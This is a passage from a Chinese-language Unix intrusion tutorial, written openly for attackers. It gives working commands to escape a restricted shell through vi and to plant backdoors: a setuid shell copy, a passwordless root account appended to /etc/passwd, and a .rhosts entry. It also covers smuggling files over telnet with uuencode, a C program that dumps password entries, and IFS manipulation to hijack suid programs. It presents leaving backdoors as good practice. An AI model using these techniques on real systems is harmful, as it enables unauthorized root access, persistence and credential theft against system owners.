3、突破shell

许多攻击系统的方法都需要攻击者首先有一个命令行式的shell,如 /bin/csh 。但有些系统提供给用户的却是菜单式的定制shell,如 pink 。所以如果你想攻击这个系统的话，首先必须要冲破这个定制shell。
我们可以利用 vi (unix中标准的编辑器) 的一些命令来达到这个目的。具体过程如下：
(1).在定制shell中选择编辑文件，这时系统启动 vi。
(2).在 vi 中，输入以下命令序列,注意：输入的命令包括最前面的 ":" )
:set shell=/bin/csh
:shell
3.这时，就像在dos程序的file菜单中选择dos shell菜单项一样，系统启动一个shell，而这个shell刚刚被我们设定成 /bin/csh，因此我们就得到了一个命令行式的unix shell。

4、后门

进入一个系统以后随手留下一个后门确实是很好的习惯, 这里介绍几种简单的后门设置方法:
(1). setuid
#cp /bin/sh /tmp/.backdoor
#chmod u+s /tmp/.backdoor
加上 suid 位到shell 上，最为简单方便.
(2). echo "wyj::0:0::/:/bin/csh" >> /etc/passwd
即给系统增加一个 id 为 0（root)的帐号，无口令.
(3). echo "+ wyj">>/.rhosts
即本地的名为wyj的用户可以直接 rlogin target 无须口令此时的wyj就相当于口令，不知道的人是不能进去的.前提是目标的port 512or513or514 opening.


5、用telnet上传文件

如果ftp被关了,sendmail也不行,如何把编译好的文件上传到主机呢?
方法很简单:
1.先把要上传的文件用uuedcode进行编码,文件会变成大概下面的样子:
begin 644 file.bat
m.c!j95@t92tp,#503u!=:%=e6#5d9%!>,2q&1d9&1c$l1d9&,2pt4%]j
m95@t85!9+7@m04%28#!@*ctp,"500d])04%!049+04]"4$e$34-"04q%04i-
m3d-"2d%,24%!14u-3d-"1d5"24=&0t%%3d="1t1(0t=02$="2da#2$9(1$-!
m1ti(1$-!1t1"4$=.1ti"3t=(0t%#3t-/0t]#3t-/0t]!3d%+0t5!07%q<7$@
m"d!%0ta/($]&1b`*0t]062`e,"y"050@+t(@0si<0d%45de2+d-/32`o0b`o
e62`*0si<0d%45de2+d-/32`*1$5,($,z7$)!5%9)4by#3tt@"@``
`
end
sum -r/size 17903/262
全部都是可见的ascii字符了
2.用telnet连接到主机后输入
$ cat >a
然后用winodws的拷贝/粘贴,把文件粘贴到telnet窗口
按^d
在当前目录下产生文件a
3.uudecode a
文件复原,然后chmod即可

6、破解shadow

很多系统下写一个小程序不停的调用getpwent() 函数便能得到没有shadow过的密码档
#include
main()
{
struct passwd *p;
while(p=getpwent())
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
}

7、从suid脚本或程序中得到root

(1).如果该程序中有包含一个类似下面的数据:
system("/bin/date")
这时你可以把自己的ifs改为"/":
ifs="/";export ifs # bourne shell
setenv ifs "/" # c shell
export ifs="/" # korn shell

这时你只要有一个你自己的软件路径调用了"bin",suid程序就会运行你的程序,并代替/bin/date

上一页  [1] [2]